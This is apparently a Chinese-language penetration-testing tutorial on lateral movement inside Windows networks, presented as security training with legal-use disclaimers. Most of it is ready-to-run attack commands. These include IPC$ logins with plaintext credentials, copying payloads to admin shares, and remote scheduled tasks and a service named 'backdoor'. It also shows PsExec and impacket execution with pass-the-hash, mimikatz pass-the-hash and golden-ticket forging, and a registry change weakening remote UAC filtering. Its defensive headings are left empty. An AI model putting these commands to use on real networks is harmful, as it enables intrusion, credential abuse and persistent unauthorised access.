作为网络安全从业者,我们经常需要在内网环境中进行安全评估和渗透测试。横向移动技术是内网渗透中的关键环节,它允许攻击者在获取初始立足点后,逐步扩大控制范围。本文将系统性地介绍Windows和Linux环境下的主流横向移动技术,包括原理分析、实操演示和安全防护建议。
横向移动(Lateral Movement)是指攻击者在成功入侵内网某台主机后,以此为跳板继续渗透网络内其他主机的过程。这种技术之所以危险,是因为它利用了内网天然的信任关系,往往能绕过边界防御措施。
根据网络环境的不同,横向移动主要分为三种典型场景:
进行有效的横向移动通常需要满足以下条件:
重要提示:本文所有技术内容仅限合法授权的安全测试使用,未经授权实施这些技术可能构成违法行为。
在进行横向移动前,建立可靠的文件传输通道至关重要。以下是几种常用的内网文件传输方法。
Windows网络共享是最基础的内网文件传输方式。通过IPC$共享,我们可以实现跨主机的文件操作:
bash复制# 查看默认共享
net share
# 建立IPC连接
net use \\10.10.10.10\IPC$ "password" /user:"administrator"
# 文件操作示例
copy payload.exe \\10.10.10.10\C$\Windows\Temp\
技术要点:
对于更复杂的场景,可以搭建临时SMB服务器:
bash复制# 快速创建匿名共享
net share test=C:\share /GRANT:Everyone,FULL
安全建议:
计划任务是经典的横向移动技术,分为AT和SchTasks两种方式:
bash复制net use \\192.168.1.100\IPC$ "Admin123" /user:domain\admin
copy payload.bat \\192.168.1.100\C$\
at \\192.168.1.100 15:00 C:\payload.bat
bash复制schtasks /create /s 192.168.1.100 /ru SYSTEM /tn taskname /sc DAILY /tr C:\payload.bat /F
schtasks /run /s 192.168.1.100 /tn taskname /i
日志分析:
通过SC命令创建远程服务:
bash复制sc \\victim create backdoor binpath= "C:\payload.exe"
sc \\victim start backdoor
注意事项:
bash复制PsExec.exe -accepteula \\192.168.1.100 -u domain\user -p password -s cmd.exe
python复制python psexec.py domain/user:password@192.168.1.100
python psexec.py -hashes :NTHASH domain/admin@192.168.1.100
技术特点:
bash复制wmic /node:192.168.1.100 /user:admin /password:pass process call create "cmd.exe /c ipconfig > C:\result.txt"
优势:
bash复制# 检查WinRM服务
winrm enumerate winrm/config/listener
# 执行远程命令
winrs -r:http://192.168.1.100:5985 -u:admin -p:pass "whoami"
配置要点:
bash复制# WMI执行
python wmiexec.py domain/user:password@192.168.1.100
# SMB执行
python smbexec.py -hashes :NTHASH domain/admin@192.168.1.100
# 计划任务执行
python atexec.py domain/user:password@192.168.1.100 "whoami"
工具对比:
| 工具名称 | 协议 | 所需端口 | 日志特征 |
|---|---|---|---|
| wmiexec | WMI | 135,445 | 登录日志 |
| smbexec | SMB | 445 | 服务日志 |
| atexec | DCE/RPC | 135,445 | 计划任务日志 |
bash复制mimikatz # sekurlsa::pth /user:admin /domain:domain.com /ntlm:HASH
限制条件:
bash复制mimikatz # kerberos::golden /user:admin /domain:domain.com /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi
黄金票据特点:
权限控制
日志监控
网络隔离
异常行为检测
工具痕迹识别
在实际渗透测试中,横向移动的成功率高度依赖于前期信息收集的完整度。以下是几个关键经验:
环境适配
隐蔽性控制
绕过限制技巧
reg复制reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
最后提醒:所有技术都应在合法授权范围内使用,安全从业者更应注重如何防御这些攻击手法,切实提升企业网络安全防护水平。